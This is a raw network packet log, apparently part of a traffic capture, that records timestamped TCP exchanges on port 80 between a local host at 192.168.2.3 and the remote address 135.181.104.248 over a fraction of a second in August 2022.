Aug 23, 2022 03:43:00.960777044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.960829020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.960860968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.960889101 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.960901022 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.960932016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.960963011 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.961512089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.961544037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.961570978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.961611986 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.961661100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.966547012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.966660976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.969839096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.969881058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.969918013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.969993114 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970007896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970053911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970232010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970284939 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970310926 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970321894 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970344067 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970361948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970380068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970400095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970405102 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970437050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970443964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970478058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970487118 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970515966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970530987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970556974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970582008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970623970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970629930 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970663071 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970679045 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970700979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970715046 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970741034 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970746040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970778942 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970802069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970817089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970834017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970854044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970866919 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970891953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970905066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970927954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.970930099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970969915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.970995903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.971005917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.971024990 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.971045017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.971071959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.971111059 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.971148014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.971163034 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.971184015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.971219063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.971223116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.971240044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.971262932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.971282959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.971328020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.998541117 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.998572111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.998588085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.998605967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.998641968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.998698950 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.998755932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.998805046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.998822927 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.998888969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.998914003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.006732941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.006820917 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.011571884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.011593103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.011610031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.011626005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.011642933 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.011744976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.011791945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.011800051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014187098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014211893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014235020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014271975 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014298916 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014519930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014545918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014566898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014604092 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014614105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014637947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014645100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014658928 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014673948 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014704943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014720917 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.014928102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.014985085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015014887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015043974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015067101 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015084982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015129089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015131950 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015155077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015176058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015197039 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015208006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015221119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015244007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015259027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015283108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015289068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015305996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015327930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015331030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015341043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015368938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015393972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015397072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015414000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015438080 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015439987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015460968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015465021 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015484095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015506983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015522003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015528917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015535116 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015552044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015574932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015583992 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015597105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015599966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015619993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015635014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015641928 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015675068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015682936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015705109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.015710115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.015738964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.016164064 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036473036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036536932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036566973 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036580086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036600113 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036617041 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036617041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036655903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036694050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036709070 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036735058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036745071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036771059 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036808014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036820889 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036844969 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036850929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.036880970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.036928892 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.044344902 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.044389009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.044450045 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.044491053 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049227953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049273014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049310923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049345970 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049352884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049377918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049384117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049396038 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049434900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049453974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049463987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049474955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049487114 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049515963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.049525976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.049628019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.051598072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051659107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051706076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.051707029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051753998 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.051764965 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051815987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051834106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.051841974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.051857948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051901102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051913023 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.051939964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051955938 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.051980972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.051986933 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052021980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052033901 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052062035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052090883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052103043 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052114964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052144051 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052186012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052196980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052227020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052268028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052289009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052308083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052315950 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052350998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052388906 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052417994 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052429914 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052453995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052469015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052474022 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052510023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052553892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052567959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052750111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052792072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052824974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052830935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052851915 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052872896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052880049 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052915096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052953959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.052973032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.052997112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053004026 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053037882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053078890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053080082 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053097010 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053121090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053148031 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053158998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053200960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053209066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053241968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053265095 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053281069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053296089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053320885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053328037 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053360939 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053400993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053423882 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053467035 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053472996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053514957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053522110 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053556919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053596020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053616047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053637028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053644896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053678036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053688049 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053719997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053762913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053769112 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053781033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053802013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053843021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053860903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053883076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053894043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053924084 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053941011 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.053962946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.053977013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.054003954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.054014921 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.054044962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.054059029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.054085970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.054099083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.054126024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.054140091 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.054167032 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.054207087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.054213047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.054223061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.054248095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.054303885 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074466944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074522018 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074568033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074609041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074639082 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074650049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074690104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074697018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074729919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074748993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074778080 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074779987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074820995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074820995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074861050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074861050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074877977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074906111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074948072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.074959040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074973106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.074990988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.075001955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.075036049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.075040102 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.075089931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.075099945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.075174093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.075193882 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.075217009 CEST	80	49812	135.181.104.248	192.168.2.3
